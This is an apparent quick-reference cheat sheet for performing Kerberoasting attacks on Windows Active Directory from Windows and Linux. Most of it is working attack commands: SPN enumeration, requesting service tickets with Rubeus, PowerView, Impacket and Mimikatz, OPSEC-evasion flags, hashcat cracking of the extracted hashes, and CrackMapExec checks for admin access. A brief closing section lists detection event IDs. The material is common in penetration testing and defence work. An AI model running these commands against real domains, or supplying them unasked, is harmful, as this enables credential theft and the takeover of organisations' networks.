Quick reference for performing and cracking Kerberoasting attacks from Windows and Linux.
| Command | Platform | Description |
|---|
setspn.exe -Q */* | Windows (CMD) | List all SPNs in the domain |
Get-DomainUser * -spn | select samaccountname | Windows (PowerView) | List SPN user accounts |
.\Rubeus.exe kerberoast /stats | Windows (Rubeus) | Kerberoastable account stats without requesting tickets |
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> | Linux (Impacket) | List SPN accounts remotely |
# Request a single TGS ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/host.domain.local:1433"
# Export from memory with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export
Import-Module .\PowerView.ps1
# Single user
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
# All SPN accounts to CSV
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs.csv -NoTypeInformation
# All kerberoastable accounts
.\Rubeus.exe kerberoast /nowrap
# High-value targets only (admincount=1)
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
# Specific user
.\Rubeus.exe kerberoast /user:sqldev /nowrap
# Force RC4 (pre-Server 2019 DCs only)
.\Rubeus.exe kerberoast /tgtdeleg /nowrap
# OPSEC-safe: tgtdeleg + skip AES-only accounts
.\Rubeus.exe kerberoast /rc4opsec /nowrap
# With alternate creds
.\Rubeus.exe kerberoast /creduser:DOMAIN\USER /credpassword:PASS /nowrap
# Filter by password age
.\Rubeus.exe kerberoast /pwdsetafter:01-31-2020 /pwdsetbefore:12-31-2022 /nowrap
# Output to file
.\Rubeus.exe kerberoast /outfile:hashes.txt /nowrap
# Enumerate SPN accounts (shows group membership, password age)
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>
# Request all TGS hashes
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request
# Request TGS for a specific user
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <SPN_USER>
# Save hashes to file
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request -outputfile tgs_hashes.txt
# Single user to file
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <SPN_USER> -outputfile user_tgs.txt
# Authenticate with NTLM hash instead of password
GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -hashes :<NTLM_HASH> -request
| Encryption | Hashcat Mode | Hash Prefix | Speed |
|---|
| RC4 (type 23) | 13100 | $krb5tgs$23$* | Fast |
| AES-128 (type 17) | 19600 | $krb5tgs$17$* | Slow |
| AES-256 (type 18) | 19700 | $krb5tgs$18$* | Very slow |
# RC4
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# AES-256
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt
# Base64 to .kirbi
echo "<base64>" | tr -d \\n | base64 -d > ticket.kirbi
# Extract hash
python2.7 kirbi2john.py ticket.kirbi
# Format for Hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > hash_for_hashcat
Get-DomainUser <USER> -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
| msDS-SupportedEncryptionTypes | Meaning |
|---|
| 0 | Default (RC4) |
| 24 | AES 128/256 only |
# Confirm access with CrackMapExec (look for "Pwn3d!" = admin access)
sudo crackmapexec smb <DC_IP> -u <USER> -p '<PASSWORD>'
| Event ID | Description |
|---|
| 4769 | Kerberos service ticket requested |
| 4770 | Kerberos service ticket renewed |
Enable via: GPO > Advanced Audit Policy > Audit Kerberos Service Ticket Operations
Anomaly indicators: bulk 4769 events from a single account, encryption type 0x17 (RC4) when AES is the norm.